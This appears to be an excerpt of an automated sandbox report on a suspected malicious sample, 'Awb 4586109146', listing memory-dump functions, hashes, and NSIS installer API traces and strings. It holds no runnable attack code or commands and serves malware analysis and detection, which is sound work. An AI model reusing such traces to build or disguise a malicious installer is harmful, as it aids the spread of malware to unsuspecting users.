Opcode ID: 46e39901b01f02e7f9e74f5f91440b349c7c2192a127518ac54909d969328078
Instruction ID: fd1c8e4da50d84f04b52884ca5da92dc56d8de87a007309060f0188573f5467a
Opcode Fuzzy Hash: 46e39901b01f02e7f9e74f5f91440b349c7c2192a127518ac54909d969328078
Instruction Fuzzy Hash: 15012F317041A04FEB65AA6CC451B6F73E2EBCE711F10883AE00ED7340EA21EC038782

Function 00151458 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7d5d06d31e90589b97e24426af35e59fe6aa5df5903965be75afbeab6e1c42
Instruction ID: dff59e97af6e6d4bc0b784904be576c36db058c62e0aa5288a188bbe8d97c6ee
Opcode Fuzzy Hash: 9b7d5d06d31e90589b97e24426af35e59fe6aa5df5903965be75afbeab6e1c42
Instruction Fuzzy Hash: C5018031E01215DFCF22EFB994512AD7BF5EB48352B24047AEC15EB241E739C8468B91

Function 39B83CA8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efac779c2ce50206f6442054dbb3f3c8ea45c3de3668353779407bdd4422618c
Instruction ID: be2304668eb817c948f8236d22470a3c196b28636236e6360609e6649c394f05
Opcode Fuzzy Hash: efac779c2ce50206f6442054dbb3f3c8ea45c3de3668353779407bdd4422618c
Instruction Fuzzy Hash: F301D439B141A94BEB949A6898116EF77AADBC9350F00423AD41AE7380DE2488028BE1

Function 39B83978 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b5205e93f84680f8c66b28a900c9245ab4ce8cce1dc5b1cd10e47427e9ad52
Instruction ID: 987a3613f3abe63c2fed03db06dfa8d18fc8c1c90a0c53f5079e8cdf08945240
Opcode Fuzzy Hash: 17b5205e93f84680f8c66b28a900c9245ab4ce8cce1dc5b1cd10e47427e9ad52
Instruction Fuzzy Hash: 1411AFB5D01259AFCB00DF9AD884ADEFBB4FB48724F50812AE918A7240C375A954CFA5

Function 39B83970 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a450d4a99032ea9c03df60e91d793733eb3ca8ada794b22fc937855a461e67
Instruction ID: d726bee7e2a23bff06ab1974b4c1bbba8ca0817624e4d737b70dd0815fb2358c
Opcode Fuzzy Hash: a0a450d4a99032ea9c03df60e91d793733eb3ca8ada794b22fc937855a461e67
Instruction Fuzzy Hash: 8521C0B5D01299AFDB00DF9AD984ACEFBB4BB48310F10856AE918A7640C3746954CFA5

Function 39B8A3C9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a1ee991ae827a6072e37600493c5efae53c4bf64605b766edb055d6e30888a
Instruction ID: 883086ff2ecdf53814abc9d04fa06cb4250bbc55b933c42cfef9d8a71925b8bb
Opcode Fuzzy Hash: b9a1ee991ae827a6072e37600493c5efae53c4bf64605b766edb055d6e30888a
Instruction Fuzzy Hash: DF018F347081A08FFB01DE7C996675B77E2EB8A740B14856DE10FD7391DA25EC038791

Function 39B84308 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9fae0c568a50b971d399c5bcb326dcf497ff2a09087bcc4d7572153049c0c0
Instruction ID: cd4d1161311f803b51db50be973cac8ae9bb50e06b79f5336c7736a8b25383b0
Opcode Fuzzy Hash: cd9fae0c568a50b971d399c5bcb326dcf497ff2a09087bcc4d7572153049c0c0
Instruction Fuzzy Hash: 9B01DC387041601BEB149A6DA81275FB2CBDBCA714F20843AE10EC7385EA66EC0243C1

Function 39B8EE60 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c063f989672850e13a39a700847281647f68eb199dc018df696f383c51f71c92
Instruction ID: 65c6cd1e6298ac69225b909311d64e6fe75a77c30d06b4266bfd13077393ff34
Opcode Fuzzy Hash: c063f989672850e13a39a700847281647f68eb199dc018df696f383c51f71c92
Instruction Fuzzy Hash: B6018C357045A04FEB94A66DD852B2F73D6DBCEB61F108839E50ED7340EA25EC034382

Function 39B8A3D8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18fc151417c22576ae244832353a5e61561ba841bb183883bafc6e776c275d5
Instruction ID: 8cdcb700cdc087b74fbdfa82089e5b0259206461e2e4894b20e697edbee4da57
Opcode Fuzzy Hash: e18fc151417c22576ae244832353a5e61561ba841bb183883bafc6e776c275d5
Instruction Fuzzy Hash: 650169347041A08FFB509A6CD866B4B73D6EB8AB50F10853CE50AE7380EA25EC038781

Function 39B88390 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edd660877d8b64fbe856fe774625d68c5a6a28c4f9d2d96f5592d706292037c
Instruction ID: a5def4e913d31e691b2e0cc40c8b40b23f16707f6107df0e3ae9b7238ac2276e
Opcode Fuzzy Hash: 6edd660877d8b64fbe856fe774625d68c5a6a28c4f9d2d96f5592d706292037c
Instruction Fuzzy Hash: A8F0223A70C3A1DFFF158E44EA822AD73A0EB88390F14413AE814DB251CB31E903C791

Function 39B8C898 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703e4abdf53d6b897a8ee01025a5399c6a21d056f43a47242ac05a4c90038c82
Instruction ID: ece9ead8b73c0e371002ff96690582fdead734e67dbdfe035fd6fb718927a5db
Opcode Fuzzy Hash: 703e4abdf53d6b897a8ee01025a5399c6a21d056f43a47242ac05a4c90038c82
Instruction Fuzzy Hash: 59F0A736A552A8A7E7149575DC0159AB37AF789350F104525ED00F7244DB31A805C7D1

Function 39B86540 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce65f96694e49f7e26d0a08845f79dde21296340525988e4d766d31c59a3b649
Instruction ID: 54605760dc0bf0c5a7bf562df931a5604b0ee3018f4a7eacd94f7cf0f1f92044
Opcode Fuzzy Hash: ce65f96694e49f7e26d0a08845f79dde21296340525988e4d766d31c59a3b649
Instruction Fuzzy Hash: DAF0927190D2CCEFEB01CE74891D68D7BB8EB0A244F2085AAD408DB242D676CA02CB10

Non-executed Functions

Function 0040338F Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004033B2
GetVersion.KERNEL32 ref: 004033B8
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
OleInitialize.OLE32(00000000), ref: 0040342F
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000006,00000008,0000000A), ref: 00403498

Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

GetTempPathW.KERNEL32(00000400,00441800,?,00000006,00000008,0000000A), ref: 004035D2
GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
lstrcatW.KERNEL32(00441800,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000006,00000008,0000000A), ref: 00403603
lstrcatW.KERNEL32(00441800,Low,?,00000006,00000008,0000000A), ref: 0040360B
SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000006,00000008,0000000A), ref: 0040361C
SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000006,00000008,0000000A), ref: 00403624
DeleteFileW.KERNEL32(00441000,?,00000006,00000008,0000000A), ref: 00403638

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
ExitProcess.KERNEL32 ref: 00403724
lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
SetCurrentDirectoryW.KERNEL32(00441800,00441800,?,00000006,00000008,0000000A), ref: 00403779
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
CopyFileW.KERNEL32(00442800,0042AA08,?,?,00000006,00000008,0000000A), ref: 004037E7
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
AdjustTokenPrivileges.ADVAPI32 ref: 00403882
ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
ExitProcess.KERNEL32 ref: 004038CA

Strings

SeShutdownPrivilege, xrefs: 00403859
~nsu, xrefs: 0040372F
Error launching installer, xrefs: 004036BA
TMP, xrefs: 0040361F
.tmp, xrefs: 0040374B
TEMP, xrefs: 00403617
\Temp, xrefs: 004035E9
NSIS Error, xrefs: 00403451
UXTHEME, xrefs: 004033DF, 004033E4, 004033EA
Low, xrefs: 00403605

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3195845224
Opcode ID: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
Opcode Fuzzy Hash: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404CB6
GetDlgItem.USER32(?,00000408), ref: 00404CC1
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
LoadBitmapW.USER32(0000006E), ref: 00404D1E
SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
DeleteObject.GDI32(00000000), ref: 00404D94
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
ShowWindow.USER32(?,00000005), ref: 00404EEE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
ImageList_Destroy.COMCTL32(?), ref: 004050BE
GlobalFree.KERNEL32(?), ref: 004050CE
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
InvalidateRect.USER32(?,00000000,?), ref: 0040521F
ShowWindow.USER32(?,00000000), ref: 0040526D
GetDlgItem.USER32(?,000003FE), ref: 00405278
ShowWindow.USER32(00000000), ref: 0040527F

Strings

M, xrefs: 00404E48
, xrefs: 00405257
N, xrefs: 00404F29

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
Opcode Fuzzy Hash: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58

Function 004059CC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00441800,75573420,00000000), ref: 004059F5
lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,00441800,75573420,00000000), ref: 00405A3D
lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,00441800,75573420,00000000), ref: 00405A60
lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,00441800,75573420,00000000), ref: 00405A66
FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,00441800,75573420,00000000), ref: 00405A76
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
FindClose.KERNEL32(00000000), ref: 00405B25

Strings

\*.*, xrefs: 00405A37

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E

Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004054BF
GetDlgItem.USER32(?,000003EE), ref: 004054CE
GetClientRect.USER32(?,?), ref: 0040550B
GetSystemMetrics.USER32(00000002), ref: 00405512
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
ShowWindow.USER32(?,00000008), ref: 004055AE
GetDlgItem.USER32(?,000003EC), ref: 004055CF
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
GetDlgItem.USER32(?,000003F8), ref: 004054DD

Part of subcall function 00404266: SendMessageW.USER32(00000028,?,?,00404091), ref: 00404274

GetDlgItem.USER32(?,000003EC), ref: 00405621
CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
CloseHandle.KERNEL32(00000000), ref: 00405636
ShowWindow.USER32(00000000), ref: 0040565A
ShowWindow.USER32(?,00000008), ref: 0040565F
ShowWindow.USER32(00000008), ref: 004056A9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
CreatePopupMenu.USER32 ref: 004056EE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
GetWindowRect.USER32(?,?), ref: 00405722
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
OpenClipboard.USER32(00000000), ref: 00405783
EmptyClipboard.USER32 ref: 00405789
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
GlobalLock.KERNEL32(00000000), ref: 0040579F
SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
GlobalUnlock.KERNEL32(00000000), ref: 004057D3
SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
CloseClipboard.USER32 ref: 004057E4

Strings

{, xrefs: 004056C7

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
Opcode Fuzzy Hash: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68

Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
ShowWindow.USER32(?), ref: 00403DB1
DestroyWindow.USER32 ref: 00403DC5
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
GetDlgItem.USER32(?,?), ref: 00403E02
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
IsWindowEnabled.USER32(00000000), ref: 00403E1D
GetDlgItem.USER32(?,?), ref: 00403ECB
GetDlgItem.USER32(?,00000002), ref: 00403ED5
SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F40
GetDlgItem.USER32(?,00000003), ref: 00403FE6
ShowWindow.USER32(00000000,?), ref: 00404007
EnableWindow.USER32(?,?), ref: 00404019
EnableWindow.USER32(?,?), ref: 00404034
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040404A
EnableMenuItem.USER32(00000000), ref: 00404051
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404069
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
SetWindowTextW.USER32(?,0042D248), ref: 004040BA
ShowWindow.USER32(?,0000000A), ref: 004041EE

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
Opcode Fuzzy Hash: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

Function 004039AA Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

lstrcatW.KERNEL32(00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800,75573420,0043F000,00000000), ref: 00403A2B
lstrlenW.KERNEL32(00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800), ref: 00403AAB
lstrcmpiW.KERNEL32(00432E78,.exe,00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
GetFileAttributesW.KERNEL32(00432E80), ref: 00403AC9
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,0043F800), ref: 00403B12

Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E

RegisterClassW.USER32(00433E80), ref: 00403B4F
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
ShowWindow.USER32(00000005,00000000), ref: 00403BD2
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
RegisterClassW.USER32(00433E80), ref: 00403C14
DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004039DE
RichEd20, xrefs: 00403BD8
RichEdit20W, xrefs: 00403BF6, 00403BFC
.exe, xrefs: 00403AB8
RichEd32, xrefs: 00403BE6
_Nb, xrefs: 00403B2E, 00403B96
RichEdit, xrefs: 00403C05
.DEFAULT\Control Panel\International, xrefs: 00403A16

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
Opcode Fuzzy Hash: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D

